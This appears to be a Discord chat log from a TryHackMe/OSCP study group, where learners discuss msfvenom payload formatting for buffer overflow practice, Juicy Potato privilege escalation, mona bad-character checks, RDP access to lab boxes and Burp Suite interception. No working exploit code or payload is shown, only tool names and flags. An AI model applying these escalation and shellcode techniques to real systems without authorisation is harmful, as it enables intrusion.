I'm working on OSCP BOF Prep.
After generating the payload with -f c,
I always have to format the code to find the Python string.
If I do -f py, it generates the string in bytes, not a hex string.
Is there a way to get it in Python hex string format?
What do you mean, "Python hex string format"? All of 'em use the \x00\x01 format.
I mean, the output of msfvenom is not "\x01", it is b"\x01" + b".." + b".." etc.
Yeah, that's how Python knows it's a byte and not a string, with the b"". Though if you want to edit it, use multi-line selection (in Sublime Text it's Ctrl+Shift+L) and you can add letters over multiple lines in one click.
okay.
Hey guys, I got a question for y'all.
I've been struggling to understand the whole potato family exploits as I don't have any Windows administration background.
Ok so, one of them being Juicy Potato, and it says that "-l <port>: COM server listen port".
This part really confuses me. I initially thought that there already WERE existing COM server ports listening for authentication within the system much like how I'd imagined being able to see them by "netstat -ano".
However, it wasn't the case according to my test. I was able to put any port number (between 1 and 65535) for the "-l" flag and was able to get to root. Does that mean we are telling JuicyPotato to use an arbitrary localhost proxy port for the authentication relay? Can anyone please confirm this, or correct me?
Yes its part of the offensive pentesting path.
I keep getting this error on the steel mountain (bottom left) when trying to connect to the http server. I tried both with Python and Python 3 and get the same error. I’m using my Kali Linux terminal
Yeah, I know, so what should I do to fix the error? Because I tried putting just Python elliotmrrobot.py ip port and the same error happened.
I got it figured out.
I’ll try that
anyone else have trouble signing into the admin account on the Corp box?
It keeps giving me some access control error about specific times the account is allowed to sign in, or no empty passwords being allowed, when I try in cmd/PowerShell; and when trying in the GUI popup it says the password expired.
Use the official MS RDP client.
is that remmina or xfreerdp?
it's this one
I don't currently use Windows. Am I able to run that in the box, or get some other Windows machine running?
you can use this room for rdp
https://tryhackme.com/room/windowsbase
it's just a windows vm for use
oh cool! Thanks
Am I the only one for whom the RDP session is not working for this room https://tryhackme.com/room/corp
Oops... my badness. I was specifying the wrong username.
Working through the buffer overflow section, and I'm a bit confused why|| mona keeps saying that \x01 is a bad character. I've already removed \x00, but unless I remove \x01, the other bad characters don't show up in the mona compare command. Yet, when I eventually do the payload, sure enough, \x01 is not a bad character. I understand that a bad character might corrupt the byte beside it, but with 0 removed, why is 1 still showing up?||
Hi all, I'm preparing for OSCP. Anyone on the same page, let me know. At present I'm working on TryHackMe boxes; if interested, hit me up and we'll work together!!!
Are you already into OSCP?
I'm doing this path, and there is the part with Burp Suite, and the websites I'm trying to connect to using Burp Suite are loading really slow, and not even coming up. Does anyone know how to fix this?
Have you left Burp Proxy in intercept mode???
And if so, forwarded the request???
I'm pretty new so I don't know a lot, can you explain?
If that thingy is blue/on it means it catches all traffic from and to your browser until you hit the forward button,
or turn it off.
It is useful to be able to modify the things before sending or receiving them.
would recommend doing the burp suite module if you are having problems using burp
@lofty finch
Also, a good idea would be to verify on this Discord so you can post images.
!docs verify
Do you understand what it does?
i think
Please explain what you think it does
It gets all the traffic from the browser to Burp so I can read it, understand it.
It holds on to all the traffic so that you can modify it before passing it on
Burp can always see anything proxied through it, regardless of if you have intercept on
Bear in mind you may be misinterpreting the instructions
And it has to be on if you want to manually modify a request before the server gets it, which is likely what you have to do
I think I know what to do,
but when I go to the Intruder and start the attack it says "No payload positions defined".
OK,
doesn't matter,
I got it.
It just didn't give me the file I need to put in.
Generally it's best to think carefully about what you're doing and why before asking for help
If you don't know what you're doing or why, you should find that out first.
I'm trying to think.
Sorry for being annoying, but I follow the tutorial and learn on the way,
and I really don't know what I'm doing wrong.
Typically, these problems can be solved by very carefully re-reading the text and looking at what you're doing
